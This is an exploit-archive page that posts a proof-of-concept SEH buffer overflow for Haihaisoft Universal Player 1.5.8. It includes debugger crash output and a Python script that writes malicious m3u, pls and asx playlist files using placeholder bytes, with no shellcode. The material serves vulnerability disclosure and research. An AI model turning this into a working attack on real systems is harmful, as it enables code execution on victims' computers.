what you don't know can hurt you

Haihaisoft Universal Player 1.5.8 Buffer Overflow

Haihaisoft Universal Player 1.5.8 Buffer Overflow
Posted Mar 25, 2014
Authored by Gabor Seljan

Haihaisoft Universal Player version 1.5.8 buffer overflow exploit.

tags | exploit, overflow
MD5 | 480cae2a36a16a13163c2e90cfed64f9

Haihaisoft Universal Player 1.5.8 Buffer Overflow

Change Mirror Download
#-----------------------------------------------------------------------------#
# Exploit Title: Haihaisoft Universal Player 1.5.8 - Buffer Overflow (SEH) #
# Date: Mar 25 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.haihaisoft.com/hup.aspx #
# Version: 1.5.8.0 #
# Tested on: Windows XP SP3 #
#-----------------------------------------------------------------------------#

# (6ec.57c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=44444444 ecx=0000000f edx=00000000 esi=04bae7d0 edi=44444448
# eip=0069537f esp=04cb7b18 ebp=04cb7b58 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** ERROR: Module load completed but symbols could not be loaded for mplayerc.exe
# mplayerc+0x29537f:
# 0069537f f3ab rep stos dword ptr es:[edi]
# 0:005> g
# (6ec.57c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
# eip=43434343 esp=04cb7748 ebp=04cb7768 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 43434343 ?? ???
# 0:005> !exchain
# 04cb775c: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc)
# 04cb7b4c: mplayerc+2e2e78 (006e2e78)
# 04cb8b80: 43434343
# Invalid exception stack at 42424242

#!/usr/bin/python

junk1 = "\x80" * 50;
offset = "\x41" * 1591;
nSEH = "\x42" * 4;
SEH = "\x43" * 4;
junk2 = "\x44" * 5000;

evil = "http://{junk1}{offset}{nSEH}{SEH}{junk2}".format(**locals())

for e in ['m3u', 'pls', 'asx']:
if e is 'm3u':
poc = evil
elif e is 'pls':
poc = "[playlist]\nFile1={}".format(evil)
else:
poc = "<asx version=\"3.0\"><entry><ref href=\"{}\"/></entry></asx>".format(evil)
try:
print("[*] Creating poc.%s file..." % e)
f = open('poc.%s' % e, 'w')
f.write(poc)
f.close()
print("[*] %s file successfully created!" % f.name)
except:
print("[!] Error while creating exploit file!")

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    1 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    1 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close